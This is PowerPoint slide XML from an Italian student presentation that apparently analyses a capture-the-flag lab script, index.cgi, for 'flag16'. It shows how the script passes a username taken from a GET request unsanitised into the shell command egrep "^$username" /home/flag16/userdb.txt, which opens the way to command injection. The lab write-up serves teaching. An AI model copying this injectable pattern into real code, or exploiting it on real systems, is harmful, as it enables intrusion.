              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" marR="0" lvl="2" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" marR="0" lvl="3" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" marR="0" lvl="4" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" marR="0" lvl="5" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" marR="0" lvl="6" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" marR="0" lvl="7" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" marR="0" lvl="8" indent="-330200" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Quicksand"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand"/>
                <a:ea typeface="Quicksand"/>
                <a:cs typeface="Quicksand"/>
                <a:sym typeface="Quicksand"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" sz="900" i="1" dirty="0"/>
              <a:t>Team: Marrazzo Vincenzo &amp; Spagna Zito Marika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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>Lo script I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ndex.cgi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A52800B-95BE-5BA9-DE13-5D488BFDA2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716249" y="1194682"/>
            <a:ext cx="7702550" cy="738027"/>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it-IT" sz="1400" dirty="0"/>
              <a:t>Lo script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> inoltre:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Crea uno scheletro di pagina HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46D23C37-604C-3D1A-95FC-914DEA60286F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191055" y="2864429"/>
            <a:ext cx="7227744" cy="134735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0" indent="0" algn="just">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>egrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> permette l'uso di espressioni regolari per il filtraggio di testo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il comando infatti cerca all’interno del file userdb.txt tutte le righe che iniziano con il valore memorizzato in username, cioè quello passato in input. E redirige eventuali errori su STDOUT. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdb.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>è vuoto, ma a noi non serve che sia pieno.  </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85310EA5-FBB1-436F-A53D-E55AA67DE09F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725201" y="1780240"/>
            <a:ext cx="7702550" cy="99766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152400" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esegue il comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>egrep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "^$username" /home/flag16/userdb.txt 2&gt;&amp;1 </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405990146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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31"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3" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6E1F3C-B1A3-B685-AE0B-816C8752F97F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974720" y="1621254"/>
            <a:ext cx="7850625" cy="72709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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>da due argomenti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username=user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(se invocato tramite linea di comando)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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it-IT"/>
              <a:t>Lo script I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ndex.cgi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A52800B-95BE-5BA9-DE13-5D488BFDA2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773829" y="1326301"/>
            <a:ext cx="7850625" cy="405517"/>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it-IT" sz="1400" dirty="0"/>
              <a:t>Lo script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>index.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> riceve input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="011635"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2786FD7C-D052-669A-96CD-5C6B586BAAC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974719" y="2428554"/>
            <a:ext cx="7850625" cy="79262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152400" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Quicksand"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>da una richiesta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.cgi?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
